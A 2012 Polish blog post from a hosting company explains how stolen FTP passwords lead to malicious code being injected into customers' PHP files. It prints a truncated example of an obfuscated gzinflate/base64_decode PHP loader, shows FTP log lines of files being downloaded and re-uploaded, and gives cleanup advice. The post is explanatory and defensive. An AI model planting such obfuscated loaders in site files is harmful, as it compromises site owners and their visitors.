07
czerwiec
2012

Złośliwy kod w plikach lub podmienione pliki na serwerze – przyczyny, skutki, rozwiązania.

Ponieważ po raz kolejny otrzymałem od Klienta zapytanie typu “Dlaczego nie działa moja strona i wyświetla błędy? Do wczoraj strona działała poprawnie a dziś się nie wyświetla. Proszę o rozwiązanie problemu.”

Nie będę ukrywał, że takie stwierdzenie przez Klienta, że ten problem jest niby z naszej winy jest baaaaardzo irytujące.

Postanowiłem w końcu opisać ten problem, jego przyczynę, skutki i rozwiązanie bo pisanie po raz kolejny emaila wyjaśniającego całą sprawę zaczyna być czasochłonne a tego typu problemów od kilkunastu miesięcy jest kilka na miesiąc więc prościej będzie odesłać Klienta pod odpowiedni link w celu zaczerpnięcia wiedzy w tym temacie, być‡ może temat rozjaśni też sprawę innym czytelnikom mającym podobne problemy i uświadomi ich o zagrożeniach jakie czyhają w sieci.


Co to jest ten “złośliwy kod”?

Przejdźmy zatem do konkretów. Zacznę od wyjaśnienia po krótce co to takiego ten złośliwy kod. Otóż jest to najczęściej doklejony fragment kodu javascript, php, zakodowanego php itp. do różnych plików na serwerze. Najczęściej celem złośliwych “robotów internetowych” czyli wszelkiej maści skryptów-automatów jest plik index.html lub index.php – to w nim najczęściej dokonywane są “wstrzyknięcia” złośliwego kodu. Przykładowy fragment złośliwego kodu – zakodowany php:

#d93065#
echo(gzinflate(base64_decode(“3VPBcoIwEP0V60FBQElIQBvTHvyEHhkPKiCMVhCYdhzHf282Sxh1
2h8oE0Ky2d339m0YDP7Hs2x2dVG1b219uZ6nm6pKT8kqL46JdXaGQ1vcdpt2l1vnb/uaS88ndMZFJsdZXX
6u8rGAsG2636ayqsu2bC9VakK2LNgnjX1tGhmvReZIKx+NMvt9vKlXZZKOX4dDkcr0a3MUJxmTKXd9l3GX
+2rFmJp4AKsFTBy2vrK4ZO5yfUhdFmknPCVqgJ1ytLNQuzymIEQZu2B0BiNkgjwwiEuZwgDz/C47myMb3m
XnTB

Zawartością takiego kodu może być np. skrypt służący do spamowania, skrypt służący do odpalania ataków na inne strony w sieci, skrypt ładujący Wam na komputer kolejne wirusy i trojany, skrypt próbujący wydobyć hasła do wordpressa od innych użytkowników itd itp – można by wymieniać w nieskończoność. Najczęściej jest to jednak mimo wszystko spam bo z tego crackerzy mają zyski i dlatego takie złośliwe działania nie ustaną, trwają od dawna.

Poświęcamy bardzo dużo czasu na uzupełnianie wiedzy w tym temacie i wprowadzamy wszelkiej maści rozwiązania by w jak najmniejszym stopniu ograniczyć skutki działania takiego złośliwego kodu, który wzbogacił pliki naszych Klientów. Dlaczego nie możemy walczyć z przyczyną tego typu ataków? Odpowiedź jest banalnie prosta – nie mamy żadnego wpływu na wiedzę naszych Klientów, na ich informatyczną ignorancję dotyczącą podstawowej zasady bezpieczeństwa jaką mogą wprowadzić – czyli używanie dobrego programu antywirusowego na swoim komputerze, nie logowanie się do serwera z wątpliwie zabezpieczonych komputerów czy sieci.


Przyczyna?

I tak oto przeszliśmy do przyczyny tych złośliwych działań czyli do wycieku haseł z Waszych komputerów drodzy Klienci i użytkownicy naszych serwerów. Ponieważ podobnych przypadków mieliśmy już sporo mamy pewne rozeznanie w temacie. Kilku Klientów poproszonych o przeskanowanie komputera w poszukiwaniu trojanów czy wirusów napisało, że nie jest możliwe by mieli wirusy, ponieważ mają zaintalowane programy antywirusowe. Poradziłem zainstalować Nortona czy Kaspersky’ego bo tak naprawdę tylko te firmy liczą się jeśli mamy do czynienia z zaawansowanymi trojanami i wirusami a takimi właśnie są te odpowiadające za wyciek haseł. Klienci, którzy zainstalowali wersje testowe tych programów potwierdzili wykrycie trojanów także uzyskaliśmy 100% potwierdzenie przyczyny wycieku haseł. Nie zmyśliliśmy tego, a kilku z Klientów próbowało winić nas za wyciek ich haseł.

Po wycieku hasła skrypty crackerów logują się np. po upływie tygodnia czy miesiąca na konta naszych użytkowników, pobierają sobie interesujące ich pliki, wzbogacają je o złośliwy kod i wrzucają zpowrotem na serwer. Ta operacja dzieje się znowu na zawirusowanych komputerach nieświadomych użytkowników sieci bądź na zhackowanych serwerach. Oto fragment z logów serwera FTP pokazujący to o czym przed chwilką pisałem:

Jun 6 22:21:12 srv3 pure-ftpd: (USERNAME@178.79.144.197) [NOTICE] /home4/USERNAME//public_html/web/inferno/index.php downloaded (2120 bytes, 313.07KB/sec)
Jun 6 22:21:12 srv3 pure-ftpd: (USERNAME@178.79.144.197) [NOTICE] /home4/USERNAME//public_html/web/inferno/index.php uploaded (2665 bytes, 54.92KB/sec)
Jun 6 22:21:12 srv3 pure-ftpd: (USERNAME@178.79.144.197) [NOTICE] /home4/USERNAME//public_html/web/kosci/index.php downloaded (1086 bytes, 146.04KB/sec)
Jun 6 22:21:13 srv3 pure-ftpd: (USERNAME@178.79.144.197) [NOTICE] /home4/USERNAME//public_html/web/kosci/index.php uploaded (1639 bytes, 33.48KB/sec)
Jun 6 22:21:13 srv3 pure-ftpd: (USERNAME@178.79.144.197) [NOTICE] /home4/USERNAME//public_html/web/voting/footer.php downloaded (682 bytes, 71.59KB/sec)
Jun 6 22:21:13 srv3 pure-ftpd: (USERNAME@178.79.144.197) [NOTICE] /home4/USERNAME//public_html/web/voting/header.php downloaded (3456 bytes, 687.21KB/sec)
Jun 6 22:21:13 srv3 pure-ftpd: (USERNAME@178.79.144.197) [NOTICE] /home4/USERNAME//public_html/web/voting/header.php uploaded (3978 bytes, 75.45KB/sec)
Jun 6 22:21:14 srv3 pure-ftpd: (USERNAME@178.79.144.197) [NOTICE] /home4/USERNAME//public_html/web/voting/index.php downloaded (17008 bytes, 2122.05KB/sec)
Jun 6 22:21:14 srv3 pure-ftpd: (USERNAME@178.79.144.197) [NOTICE] /home4/USERNAME//public_html/web/voting/index.php uploaded (16751 bytes, 185.70KB/sec)
Jun 6 22:21:14 srv3 pure-ftpd: (USERNAME@178.79.144.197) [NOTICE] /home4/USERNAME//public_html/web/voting/login.php downloaded (1859 bytes, 158.72KB/sec)
Jun 6 22:21:14 srv3 pure-ftpd: (USERNAME@178.79.144.197) [NOTICE] /home4/USERNAME//public_html/web/voting/login.php uploaded (2357 bytes, 40.90KB/sec)

Skutki.

Tak podmienione pliki lub wzbogacone o złośliwy kod najczęściej przestają działać, sypią się błędy, lub działają normalnie otwierając stronę, a w tle ładowany jest właśnie wirus na Twój niezabezpieczony żadnym antywirusem komputer drogi czytelniku! Google często indeksując takie strony wychwytuje złośliwy kod i przeglądarki ostrzegają nas o niebezpieczeństwie wizyty na takiej stronie. Tobie Kliencie spada oglądalność, a użytkownik odwiedzający Twoją stronę naraża się na zawirusowanie komputera. Podsumowując – same szkody dla wszystkich wynikają z posiadania takiego złośliwego kodu dlatego Apeluję do Was czytelnicy! Nie idźcie tą drogą! Zainwestujcie w dobre programy antywirusowe! Będziecie w dużo mniejszym stopniu narażeni na wyciek haseł i inne zagrożenia związane z wszechobecnym Internetem.


Rozwiązanie.

Już wiemy, że podstawowym rozwiązaniem ustrzeżenia się przed wyciekiem haseł z naszego komputera będzie instalacja porządnego antywirusa. Jeśli jednak doszło już do wycieku hasła do serwera to należy przede wszystkim pozbyć się przyczyny czyli:

1) Zainstalować porządny program antywirusowy – mowa o Norton lub Kaspersky – lepszych osobiście nie znam,
2) Zmienić hasło do serwera lub konkretnego konta ftp na trudne do odgadnięcia,
3) Oczyścić pliki ze złośliwego kodu lub najlepiej przywrócić pliki z czystej kopii bezpieczeństwa, nie muszę chyba przypominać o obowiązku jej sporządzania we własnym zakresie, dla Klientów “olewających” ten temat mamy specjalną odpłatną usługę przywrócenia plików z naszego backupu

Pod warunkiem, że nie zostały dograne przez złośliwego robota żadne inne skrypty php służące do edycji plików, spełnienie powyższych trzech punktów daje nam niemal 100% pewność, że wyciek hasła z komputera Wam nie grozi. Pozostają już tylko inne zagrożenia jak wspomniane przed chwila dodatkowe pliki dograne do waszego serwera, i jeśli nie przeglądacie co jakiś czas katalogów na serwerze, a pewnie 99% z Was tego nie robi to jest szansa, że nawet nie wiecie o istnieniu takich plików na waszym serwerze. Wgrane one mogły być po wycieku hasła lub co też często się zdarza poprzez dziurawe, nieaktualne skrypty php takie jak WordPress, osCommerce, Joomla itp itd ale to znów temat na kolejny artykuł czyli ignorancja w temacie aktualizacji skryptów. Znakomita większość z Was zainstalowała Joomlę czy inne Mambo 5 lat temu, a później ze zdziwieniem pisze, że strona została zhackowana i że nasze zabezpieczenia są do D. Przyzwyczailiśmy się już, że winą za całe zło obarczani jesteśmy my jako usługodawca. Tak jest najprościej.

< Wróć

O firmie

Nasza firma - Web Hosting Solutions - świadczy wysokiej jakości usługi hostingowe w Internecie. Działamy nieprzerwanie od 2003-go roku. Wcześniej firma działała pod nazwą DMK project.

Ponad 15 lat doświadczenia w branży hostingowej pozwala nam świadczyć usługi na możliwie najwyższym poziomie. Nie stoimy w miejscu - wraz z postępem technologicznym i większym zapotrzebowaniem naszych Klientów płynnie zmieniamy ofertę, modernizujemy infrastrukturę software'owo-sprzętową. Oferujemy dobry hosting w dobrej cenie.

Zapraszamy do skorzystania z naszej oferty serwerów wirtualnych, serwerów resellerskich oraz domen globalnych.

WHS na Facebook - zapraszamy

© Copyright - webhostingsolutions.pl 2003-2018logo_small